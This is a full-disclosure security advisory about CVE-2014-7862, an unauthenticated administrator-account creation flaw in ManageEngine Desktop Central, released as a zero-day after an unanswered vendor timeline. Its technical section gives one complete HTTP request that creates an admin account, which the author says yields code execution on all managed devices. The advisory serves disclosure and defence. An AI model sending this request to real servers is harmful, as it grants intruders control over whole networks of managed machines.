Desktop Central Add Administrator

`Hi,  
  
This is part 10 of the ManageOwnage series. For previous parts, see [1].  
  
This time we have a vulnerability that allows an unauthenticated user  
to create an administrator account, which can then be used to execute  
code on all devices managed by Desktop Central (desktops, servers,  
mobile devices, etc).  
An auxiliary Metasploit module that creates the administrator account  
has been released and its currently awaiting review [2]. I will leave  
to someone else the task of creating an exploit that executes code on  
all managed devices (it's not hard to write but testing it properly  
might take a fair few hours).  
  
I am releasing this as a 0 day as 112 days have elapsed since I first  
communicated the vulnerability to ManageEngine. I received many  
promises about getting updates but they were very evasive (a  
disclosure timeline is at the bottom of this email). The full advisory  
text is below, and a copy can be obtained from my repo [3].  
  
Regards,  
Pedro  
  
>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP  
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security  
=================================================================================  
Disclosure: 31/12/2014 / Last updated: 31/12/2014  
  
>> Background on the affected product:  
"Desktop Central is an integrated desktop & mobile device management  
software that helps in managing the servers, laptops, desktops,  
smartphones and tablets from a central point. It automates your  
regular desktop management routines like installing patches,  
distributing software, managing your IT Assets, managing software  
licenses, monitoring software usage statistics, managing USB device  
usage, taking control of remote desktops, and more."  
  
This vulnerability is being released as a 0day since ManageEngine  
failed to take action after 112 days. See timeline for details.  
  
>> Technical details:  
Vulnerability: Administrator account creation (unauthenticated)  
CVE-2014-7862  
Constraints: none; no authentication or any other information needed  
Affected versions: all versions from v7 onwards  
  
GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&[email protected]&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337  
  
This creates a new administrator user "dcpwn" with the password  
"admin". You can now execute code on all devices managed by Desktop  
Central!  
  
A Metasploit module that exploits this vulnerability has been released.  
  
>> Fix:  
UNFIXED - ManageEngine failed to take action after 112 days.  
  
Timeline of disclosure:  
11/09/2014:  
- Vulnerability information sent to Romanus, Desktop Central project manager.  
  
23/09/2014:  
- Requested an update. Received reply "My development team is working  
on this to provide a fix. Let me check this and update you the  
status."  
  
17/10/2014  
- Requested an update. Received reply on the 19th "Due to festive  
season here i'm unable to get the update. Let me find this and update  
you by Monday."  
  
30/10/2014  
- Requested an update. Received reply "The development and testing of  
the reported part should get over in another 3 weeks and when it is  
ready for release build I'll send it for testing."  
  
23/11/2014  
- Requested an update. Received reply on the 24th "I was traveling  
hence couldn't give you an update. It should get released by next  
week or early second week. I'll send you an update on this."  
  
31/12/2014  
- Released information and exploit 112 days after initial disclosure.  
  
  
[1]  
http://seclists.org/fulldisclosure/2014/Aug/55  
http://seclists.org/fulldisclosure/2014/Aug/75  
http://seclists.org/fulldisclosure/2014/Aug/88  
http://seclists.org/fulldisclosure/2014/Sep/1  
http://seclists.org/fulldisclosure/2014/Sep/110  
http://seclists.org/fulldisclosure/2014/Nov/12  
http://seclists.org/fulldisclosure/2014/Nov/18  
http://seclists.org/fulldisclosure/2014/Nov/21  
http://seclists.org/fulldisclosure/2014/Dec/9  
  
[2]  
https://github.com/rapid7/metasploit-framework/pull/4493  
  
[3]  
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt  
`